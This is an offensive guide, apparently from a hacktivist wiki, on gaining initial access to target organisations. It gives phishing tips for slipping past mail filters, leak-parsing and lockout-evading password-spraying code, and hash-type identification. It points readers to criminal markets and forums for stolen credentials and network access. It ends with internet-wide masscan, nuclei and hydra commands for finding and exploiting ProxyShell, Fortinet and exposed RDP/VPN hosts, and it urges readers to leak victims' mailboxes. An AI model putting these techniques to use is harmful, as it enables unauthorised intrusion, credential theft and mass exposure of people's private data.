Initial Access Tactics, techniques and procedures
Phishing
Phishing is the most common initial access method used by advanced persistent threat (APT) groups and organised cybercrime gangs, because it relies on social engineering rather than on a technical flaw: the target is tricked into opening a malicious e-mail attachment or following a malicious link.
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers GoPhish adds (X-Mailer: gophish, X-Gophish-Contact, X-Gophish-Signature) and change the default rid= tracking parameter in its links; mail filters fingerprint all of them
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
- Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | remove the identifying headers gophish adds
- Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office
Password Attacks
Groups like Lapsus$ showed the world that you don't need to be a highly technical hacker to pwn massive corporations: if common password and multi-factor authentication (MFA) attacks work on the likes of Uber, Rockstar Games, Okta and so on, they will work on our hacktivist targets!
If your target uses multi-factor authentication you can try either social engineering (for example phoning the helpdesk as the user) or MFA fatigue, repeatedly triggering push prompts until the user accepts one.
Usernames
Create a bespoke username word list from OSINT, recon and permutations of the names of your target's employees (LinkedIn, the company website and other social media profiles). Combined with the e-mail format the company uses (first.last@, flast@ and so on) this gives you the candidate usernames and e-mail addresses for password spraying.
- https://github.com/digininja/CeWL
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://github.com/shroudri/username_generator
Passwords
Common and leaked credentials to test login portals and network services.
Default passwords
- https://cirt.net/passwords
- https://default-password.info
- https://datarecovery.com/rd/default-passwords
- https://github.com/ihebski/DefaultCreds-cheat-sheet
Common and leaked passwords
- https://wiki.skullsecurity.org/index.php?title=Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/projectdiscovery/nuclei-templates/tree/main/helpers/wordlists
Brute-forcing tools (online password attacks against login services, not hash cracking; for that see Hash cracking below)
- https://github.com/byt3bl33d3r/SprayingToolkit
- https://www.kali.org/tools/hydra
- https://www.kali.org/tools/brutespray
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://github.com/1N3/BruteX
Searching leaks
- https://github.com/khast3x/h8mail [Free but includes paid services]
Services
Please note: DO NOT use intelx[.]io, as they have doxed hackers in the past and block the use of Tor. AVOID!
You can use services that compile combo lists (leaked credentials) to search for your target's domain, then download the results and use them in a password attack to see whether your target recycles credentials.
- https://haveibeenpwned.com
- https://exposed.lol
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once your leaks have been downloaded, parse the results into email:pass format, keep only entries for your target's domains, and deduplicate them. Dumps mix separators (colon, semicolon, comma) and orderings, so split on the e-mail address rather than on the first colon, or passwords containing ':' get truncated.
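An added example of that normalisation step (not code from any of the services above): it anchors on the e-mail address so passwords containing separators survive, accepts both email:pass and pass:email orderings, filters to the target's domains including subdomains, and deduplicates on the (email, password) pair so a user with two different leaked passwords keeps both. The sample lines are constructed.

```python
import re
from typing import Iterable, Optional

# Anchor on the e-mail so a password containing ':' or ';' stays intact.
_EMAIL = r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}"
_SEP = r"\s*[:;,|\t ]\s*"
_EMAIL_FIRST = re.compile(rf"^\s*({_EMAIL}){_SEP}(.+?)\s*$")   # email<sep>password
_EMAIL_LAST = re.compile(rf"^\s*(.+?){_SEP}({_EMAIL})\s*$")    # password<sep>email


def parse_combo_line(line: str) -> Optional[tuple[str, str]]:
    """Return (email, password) from one dump line, or None if unparseable."""
    m = _EMAIL_FIRST.match(line)
    if m:
        return m.group(1).lower(), m.group(2)
    m = _EMAIL_LAST.match(line)
    if m:
        return m.group(2).lower(), m.group(1)
    return None


def _in_scope(email: str, domains: set[str]) -> bool:
    """True for exact domain matches and for subdomains (mail.example.com)."""
    host = email.rsplit("@", 1)[1]
    return any(host == d or host.endswith("." + d) for d in domains)


def normalise_leaks(lines: Iterable[str], target_domains: Iterable[str]) -> tuple[list[str], dict]:
    """Filter raw dump lines to the target's domains and emit 'email:pass'.

    Lines that carry a hash instead of a cleartext password are kept; route
    those to the hash cracking step rather than to the sprayer.
    """
    domains = {d.lower().lstrip("@") for d in target_domains}
    seen: dict[tuple[str, str], None] = {}
    stats = {"lines": 0, "unparsed": 0, "out_of_scope": 0, "kept": 0}
    for raw in lines:
        stats["lines"] += 1
        parsed = parse_combo_line(raw)
        if parsed is None:
            stats["unparsed"] += 1
            continue
        email, password = parsed
        if not password or not _in_scope(email, domains):
            stats["out_of_scope"] += 1
            continue
        seen[(email, password)] = None
    stats["kept"] = len(seen)
    return [f"{e}:{p}" for e, p in seen], stats


# Constructed sample dump lines (mixed separators and orderings, one duplicate).
SAMPLE_DUMP = [
    "User@Example.com:Winter2023!",
    "other@corp.net:hunter2",
    "Summer2023;user@example.com",
    "garbage line with no address",
    "user@example.com:Winter2023!",
    "admin@sub.example.com,Passw0rd:x",
]

if __name__ == "__main__":
    combos, stats = normalise_leaks(SAMPLE_DUMP, ["example.com"])
    print("\n".join(combos))
    print(stats)
```

Keep the stats: a high "unparsed" count usually means the dump uses a separator you have not listed, and "out_of_scope" tells you how much of the download was noise.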
Password spraying
Employees commonly reuse weak credentials for convenience. If you already have valid passwords, spray them across other services to test whether they have been recycled. You can also take common passwords (Spring2023, CompanyName2023!) and spray them against your username list hoping an employee chose a guessable one. Spray one password across all users per round and wait out the lockout observation window between rounds; otherwise you lock accounts and tip off the defenders.
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
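Lockout-aware scheduling, as an added example that is not code from any of the spraying tools listed (they implement their own delays): it generates the seasonal candidates described above and lays out attempts password-major so no account collects more than (threshold minus headroom) failures inside one observation window, then verifies that property. The threshold and window values are assumptions; take the real ones from the target's policy (net accounts on a domain-joined host) or from a cautious default such as 1 password per 30 minutes. The actual login attempts are left to the tools.

```python
from dataclasses import dataclass

SEASONS = ("Winter", "Spring", "Summer", "Autumn", "Fall")
MONTHS = ("January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December")


def seasonal_passwords(year: int, company: str = "") -> list[str]:
    """'Spring2023'-style candidates: season, month or company name + year,
    plus the suffixes people append to satisfy complexity rules."""
    yy = str(year)[-2:]
    bases = [f"{w}{year}" for w in SEASONS + MONTHS]
    bases += [f"{w}{yy}" for w in SEASONS]
    if company:
        bases += [f"{company}{year}", f"{company}{yy}", f"{company.lower()}{year}"]
    out: dict[str, None] = {}            # ordered dedupe
    for base in bases:
        for suffix in ("", "!", "1", "#"):
            out[base + suffix] = None
    return list(out)


@dataclass(frozen=True)
class Attempt:
    minute: int      # offset from campaign start
    user: str
    password: str


def plan_spray(users: list[str], passwords: list[str], lockout_threshold: int,
               observation_window_min: int, headroom: int = 2,
               margin_min: int = 5) -> list[Attempt]:
    """Lay out attempts so no account receives more than
    lockout_threshold - headroom failures within one observation window.

    Password-major order: every user gets password 1 before anyone gets
    password 2, so a hit on a popular password surfaces early and failures
    are spread across accounts instead of hammering one.  Rounds are spaced
    by the window plus a margin because the counter only resets after a
    full window has passed since the last failure.
    """
    per_window = max(1, lockout_threshold - headroom)
    spacing = observation_window_min + margin_min
    plan: list[Attempt] = []
    for round_no, start in enumerate(range(0, len(passwords), per_window)):
        minute = round_no * spacing
        for pw in passwords[start:start + per_window]:
            for user in users:
                plan.append(Attempt(minute, user, pw))
    return plan


def max_failures_per_window(plan: list[Attempt], observation_window_min: int) -> int:
    """Worst-case attempts any single user receives inside one window
    (assumes every attempt fails, the safe assumption for a spray)."""
    by_user: dict[str, list[int]] = {}
    for a in plan:
        by_user.setdefault(a.user, []).append(a.minute)
    worst = 0
    for minutes in by_user.values():
        minutes.sort()
        for i, m in enumerate(minutes):
            worst = max(worst, sum(1 for x in minutes[i:] if x < m + observation_window_min))
    return worst


if __name__ == "__main__":
    # Constructed inputs: two accounts, assumed policy of 5 failures / 30 minutes.
    users = ["a@example.com", "b@example.com"]
    plan = plan_spray(users, seasonal_passwords(2023, "Acme")[:7], 5, 30)
    print(f"{len(plan)} attempts, worst case {max_failures_per_window(plan, 30)} per window")
    for a in plan:
        print(f"t+{a.minute:>3}m  {a.user}  {a.password}")
```

Pipe the plan into whichever sprayer you use, sleeping until each attempt's minute; if max_failures_per_window ever exceeds the policy threshold, the plan is wrong, not the policy.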
Hash cracking
Crack password hashes using both online and offline tools!
Identify hash
Online tools
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
Offline tools
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
- https://github.com/NotSoSecure/password_cracking_rules
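Identifying the hash type before cracking, as an added example (not code from hashcat or john): it classifies common formats by structure, returns every candidate for the ambiguous fixed-length hex strings (a 32-hex string is MD5 or NTLM; nothing in the string tells you which), maps each to its hashcat -m mode, and buckets a mixed list so each bucket is one hashcat run. The bcrypt sample is the widely published test hash of "password"; the other samples are constructed and not real hashes.

```python
import re
from typing import Optional

_HEX = lambda n: re.compile(rf"^[0-9a-fA-F]{{{n}}}$")

# (name, hashcat mode, pattern). Salted/structured formats are unambiguous;
# bare hex strings of one length match several algorithms, so all are returned.
HASH_PATTERNS = [
    ("NetNTLMv2", 5600, re.compile(r"^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]{16,}$")),
    ("NetNTLMv1", 5500, re.compile(r"^[^:]+::[^:]*:[0-9a-fA-F]{48}:[0-9a-fA-F]{48}:[0-9a-fA-F]{16}$")),
    ("bcrypt", 3200, re.compile(r"^\$2[abxy]?\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("sha512crypt", 1800, re.compile(r"^\$6\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{86}$")),
    ("sha256crypt", 7400, re.compile(r"^\$5\$(rounds=\d+\$)?[^$]{1,16}\$[./A-Za-z0-9]{43}$")),
    ("md5crypt", 500, re.compile(r"^\$1\$[^$]{1,8}\$[./A-Za-z0-9]{22}$")),
    ("MD5", 0, _HEX(32)),
    ("NTLM", 1000, _HEX(32)),
    ("SHA1", 100, _HEX(40)),
    ("SHA256", 1400, _HEX(64)),
    ("SHA512", 1700, _HEX(128)),
]


def identify_hash(value: str) -> list[tuple[str, int]]:
    """Return [(name, hashcat_mode), ...] candidates for one hash, best first."""
    value = value.strip()
    return [(name, mode) for name, mode, pat in HASH_PATTERNS if pat.match(value)]


def group_by_mode(hashes: list[str], assume_ntlm: bool = False) -> dict[Optional[int], list[str]]:
    """Bucket hashes by hashcat mode so each bucket can be cracked in one run.

    Unrecognised strings land under the None key so they are not silently
    dropped.  assume_ntlm=True resolves the 32-hex ambiguity towards NTLM,
    which is right for anything dumped from NTDS.dit or the SAM.
    """
    buckets: dict[Optional[int], list[str]] = {}
    for h in hashes:
        candidates = identify_hash(h)
        if not candidates:
            buckets.setdefault(None, []).append(h)
            continue
        name, mode = candidates[0]
        if assume_ntlm and ("NTLM", 1000) in candidates:
            mode = 1000
        buckets.setdefault(mode, []).append(h.strip())
    return buckets


# Samples: bcrypt of "password" (published test vector); the rest are constructed.
SAMPLES = [
    "5f4dcc3b5aa765d61d8327deb882cf99",                                  # MD5 or NTLM
    "$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy",     # bcrypt
    "$6$saltsalt$" + "A" * 86,                                           # sha512crypt shape
    "admin::CORP:1122334455667788:" + "ab" * 16 + ":" + "01" * 20,       # NetNTLMv2 shape
    "not a hash at all",
]

if __name__ == "__main__":
    for mode, items in group_by_mode(SAMPLES, assume_ntlm=True).items():
        print(f"hashcat -m {mode}:" if mode is not None else "unrecognised:", items)
```

When a bucket is ambiguous, run the cheap mode first (NTLM and MD5 both crack at billions per second on a GPU), and treat a list of 32-hex values as NTLM whenever it came out of a domain controller or a Windows host.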
Buying access
You can use Russian Market to purchase credentials stolen from targets by info-stealer malware. Search for your target there to see whether an employee account gives you a quick win; any account that grants internal access is a great start.
You can also find initial access brokers selling network access into companies on forums. Their offerings include, but are not limited to, account credentials, shells, implants and other remote access (RDP, VPN, SSH, etc.).
- https://xss.is (Tor)
- https://exploit.in [Paid] (Tor)
- https://ramp4u.io [Free & Paid] (Tor)
Spray and pray
As Guacamaya showed, hacktivists can benefit from a targeted spray-and-pray campaign: scan the IP ranges of countries of interest, or your target companies' ranges, for critical vulnerabilities, and hit exposed protocols with password attacks. In Guacamaya's case they scanned for and exploited ProxyShell, pulled every mailbox out of their targets' Microsoft Exchange servers and leaked them. You can do the same. See Scanning and Recon for tools such as nuclei and the Nmap Scripting Engine (NSE) to vulnerability scan the IP addresses you discover.
Networks
Vulnerability Scanning
We can use a vulnerability-scanning spray-and-pray approach against publicly facing applications: masscan the whole internet or specific IP ranges for a handful of ports, then check the live hosts for critical vulnerabilities that we can exploit for initial access into the target network. Here we scan for and exploit both ProxyShell (CVE-2021-34473, Microsoft Exchange) and CVE-2018-13379 (Fortinet SSL VPN path traversal), as both are critical, widely exploited and still common. In your own attacks focus on CVEs, new and old, that are known to be exploited in the wild rather than on CVSS score alone.
The workflow is: port scan the IP ranges (the entire internet or a country's ranges), append the discovered port to each IP separated by a colon (host:port), vulnerability scan those hosts, and finally exploit the confirmed hits.
If the scan output is too large, use split to break it into smaller files and scan each one in its own screen/tmux window or session so the work runs in parallel:
split -l 10000 results.txt results_
IP Ranges:
- List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
- CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
- Scan the entire internet: 0.0.0.0/0
Proxyshell
Tool: masscan
1. Scan for Proxyshell:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
sed -i 's/$/:443/' results.txt
nuclei -l results.txt -t nuclei-templates/http/cves/2021/CVE-2021-34473.yaml -o vulns.txt
Exploit Discovered hosts: Proxyshell
CVE-2018-13379
2. Scan for CVE-2018-13379:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p4443,10443,8443 --open-only --excludefile block.txt --output-format list --output-file results.txt
awk '/^open/ { print $4 ":" $3 }' results.txt > final_results.txt
(the list format starts with a "#masscan" line and ends with "# end"; matching only lines beginning with "open" keeps those comments from becoming bogus targets)
nuclei -l final_results.txt -t nuclei-templates/http/cves/2018/CVE-2018-13379.yaml -o vulns.txt
Exploit Discovered hosts: Fortinet SSL VPN Path Traversal
Tool: zmap
1. Scan for Microsoft Exchange e-mail servers (zmap scans the entire IPv4 space unless you pass ranges or an allowlist with -w, so set a blocklist with -b and mind your rate):
sudo zmap -q -p 443 | httpx -silent -s -sd -location | awk '/owa/ { print substr($1,9) }' > owa.txt
2. Vulnerability scan the discovered hosts for ProxyShell using NSE:
nmap -p 443 -Pn -n --script http-vuln-exchange-proxyshell.nse -iL owa.txt
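The parsing and splitting steps of the pipeline above, as an added example (not code from masscan, nuclei or nmap): it reads either masscan output format, skips the comment lines, deduplicates, sorts numerically by IP so the chunks are contiguous, and writes the host:port chunks that nuclei -l or nmap -iL consume. The sample scan lines are constructed from the reserved documentation ranges 203.0.113.0/24 and 198.51.100.0/24.

```python
import re
from pathlib import Path

# masscan -oL line:    open tcp 443 203.0.113.5 1700000000
# masscan stdout line: Discovered open port 443/tcp on 203.0.113.5
_IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
_LIST_LINE = re.compile(rf"^open\s+(?:tcp|udp)\s+(\d+)\s+{_IP}\b")
_STDOUT_LINE = re.compile(rf"^Discovered open port (\d+)/(?:tcp|udp) on {_IP}")


def _ip_key(hostport: tuple[str, int]) -> tuple[tuple[int, ...], int]:
    """Sort key: numeric octets then port, so 9.x sorts before 10.x."""
    ip, port = hostport
    return tuple(int(o) for o in ip.split(".")), port


def parse_masscan(text: str) -> list[str]:
    """Turn masscan output (either format, comment lines included) into a
    sorted, deduplicated host:port list for nuclei -l / httpx -l."""
    found: set[tuple[str, int]] = set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                      # "#masscan" / "# end" framing lines
        m = _LIST_LINE.match(line) or _STDOUT_LINE.match(line)
        if m:
            found.add((m.group(2), int(m.group(1))))
    return [f"{ip}:{port}" for ip, port in sorted(found, key=_ip_key)]


def chunk(targets: list[str], size: int) -> list[list[str]]:
    """Split the target list into pieces of at most `size` entries
    (the Python equivalent of split -l size)."""
    return [targets[i:i + size] for i in range(0, len(targets), size)]


def write_chunks(targets: list[str], size: int, prefix: str = "results_") -> list[Path]:
    """Write each chunk to prefix000.txt, prefix001.txt, ... and return the paths."""
    paths = []
    for n, part in enumerate(chunk(targets, size)):
        path = Path(f"{prefix}{n:03d}.txt")
        path.write_text("\n".join(part) + "\n")
        paths.append(path)
    return paths


# Constructed sample mixing both masscan output styles, with a duplicate.
SAMPLE_SCAN = """#masscan
open tcp 8443 203.0.113.5 1700000001
open tcp 443 203.0.113.5 1700000000
Discovered open port 443/tcp on 198.51.100.7
open tcp 443 203.0.113.5 1700000009
# end
"""

if __name__ == "__main__":
    targets = parse_masscan(SAMPLE_SCAN)
    for p in write_chunks(targets, 2):
        print(p, p.read_text().splitlines())
```

Run one nuclei or nmap process per chunk file from separate screen windows; because the chunks are sorted by IP, a stalled window tells you immediately which range is still unscanned.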
Domains
Mass subdomain enumeration, port scanning and vulnerability scanning of domains at the start of an operation, when targeting a country or specific TLDs (e.g. .gov), is a great way to get broad coverage and find low-hanging-fruit vulnerabilities that may serve as the initial access vector.
See Domain Spray and Pray scanning.
Password Attacks
Many organisations expose VPN and RDP so that employees and third-party contractors can reach the internal network remotely. Development, test, lazily administered or simply forgotten servers are often left running with weak or default credentials and no multi-factor authentication. Port scan the internet for the ports these services commonly run on, cross-reference against Shodan for standard and non-standard ports, then try common and default credentials. Mind account lockout policies: a few guesses per account spread over time, not a whole dictionary against one user.
RDP
1. Remote Desktop (RDP) brute forcing (hydra reads the file masscan wrote; keep -t low, hydra itself warns that RDP servers drop connections under many parallel tasks and suggests -t 1 or -t 4):
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
hydra -L usernames.txt -P passwords.txt -M results.txt -t 4 rdp -o results
VPN
2. Virtual Private Network (VPN) Brute forcing:
sudo masscan -Pn -sS -iL ranges.txt --rate 50000 -p10443,443 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt
- To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing